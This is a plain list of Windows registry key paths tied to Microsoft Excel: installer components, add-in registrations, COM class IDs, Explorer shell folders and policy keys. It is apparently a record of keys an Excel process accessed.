HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4239D8B225FD17359ADB4DD186E034CA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\410BCE31B8EF88F55B8A45EEE4A56948
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\410BCE31B8EF88F55B8A45EEE4A56948\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5C39EAC199B7C92568B11750B7085F1F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5C39EAC199B7C92568B11750B7085F1F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\907E7A0CC11B9375BAFE99956DBDE71B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\907E7A0CC11B9375BAFE99956DBDE71B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ECF536A0FC41575A93F78BF09950DCC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ECF536A0FC41575A93F78BF09950DCC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4809AA2DF4CFCEE5ABD3E4D7F312A014
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4809AA2DF4CFCEE5ABD3E4D7F312A014\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E811AEC31EF68C1508545E0F365CB7DC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E811AEC31EF68C1508545E0F365CB7DC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DD472E42C51B0AB539442C365F3EFE81
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DD472E42C51B0AB539442C365F3EFE81\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5E547612A1D42A955A40D1E4432AF329
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5E547612A1D42A955A40D1E4432AF329\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A94CA8ABA9A99C9598D9A78D7A6A8C73
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A94CA8ABA9A99C9598D9A78D7A6A8C73\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F56E4E9352099925286C014C79242183
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F56E4E9352099925286C014C79242183\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E7FF8515F21145850959F0B78055A84A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E7FF8515F21145850959F0B78055A84A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0750A4730C266FA5B8D1181D57211E6C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0750A4730C266FA5B8D1181D57211E6C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0C62291B244AA6653BC86EDA89BF31E8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0C62291B244AA6653BC86EDA89BF31E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E36CCA28A7D47A75BAF8A226E24DCB3A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E36CCA28A7D47A75BAF8A226E24DCB3A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\89CFAE503A820AC56AA95A736071ADA5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\89CFAE503A820AC56AA95A736071ADA5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FA7E207402F1CB54A8B90E8EB5BB922
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FA7E207402F1CB54A8B90E8EB5BB922\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8C4122CEE53E1551A5B818833CA7799
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8C4122CEE53E1551A5B818833CA7799\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CD6909398BEC48A51BAA2C2B6BF4DF48
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CD6909398BEC48A51BAA2C2B6BF4DF48\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\64960683A17D56D5EA1238CE53DE45FD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\64960683A17D56D5EA1238CE53DE45FD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5BAD414826581656ABB097131FDE0E3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5BAD414826581656ABB097131FDE0E3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\261F18653EB99DB5EB69C257C1F3440D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A499316D3DA49085A9DDEA93BAAC39E1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D20F91EFF0F62E58BFCC619AB5E4E34
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E758E77A40A2E8C5A9423FEE6133E44F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9416FE94F719EF65AB01E3288CC88D62
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2BCFED166AAD39C57BE319E2D99868AC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6E994F393BDA5B159A3A5D40B127E7FB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7345E55484AE6BA5C86E5F9874AEA2BC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F1FABABBB0C1F40539E70BF6637C8C32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\724B41E1D56186B51AA949F6D9382562
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\809FEEBF22CE11653864973BD3478A99
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FAE24EF759A86B75F82A1D8FBD3F1BD8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8C1FFC5217A07C957AEC30A57E5008C1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3C2BE3CC4D5BB305EA3639319C95BAFA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A9B4966AC0F6E4650AFF977CDBB147C9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4E637D47575E41B548AD643598031990
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01D4C108F1473DC548795B47BC8060BC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2F2F74E6536EF5454B635C62BA22AF91
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E2AAABD408DA335EA7D562EE63A1A89
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E29AB4A2602162F5183D202BF61515F3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A855F91A7C5DE1D57BBFF368946C37A7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01510463DC3700B5FBB1BB53522208FD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A6DB6A88B784BCF5892FA8AA56424AC3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C572FE5B128236957AD36971133EAB15
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DDC1047246B81FF5D875F208CCC66BF4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9023EDAD43D32DC59AAAD7010892ACBB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\230B3EB6288B35C5DB750A7C2487C7B1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\102E44E2E4226BC5F9696DD7433F5E8C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C162EDDD35A5E54E8BFF303C05BE886
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CD6DBC5FC9C5E034387A71B94A9988DC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7F47F7E03490EFA4AAD5D5EAB3941AF9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7A1D1891699C40E459B785BF7198266C
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Delete Commands
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Init Menus
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Init Commands
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Excel\Addins
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect
HKEY_CURRENT_USER\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_CLASSES_ROOT\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1
HKEY_CURRENT_USER\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_CLASSES_ROOT\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1
HKEY_CURRENT_USER\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_CLASSES_ROOT\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1
HKEY_CURRENT_USER\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_CLASSES_ROOT\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_CLASSES_ROOT\Excel.Chart.8\protocol\StdFileEditing\server
HKEY_CLASSES_ROOT\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020827-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c645-6060-11ed-bf52-806e6f6e6963}\
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c644-6060-11ed-bf52-806e6f6e6963}\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
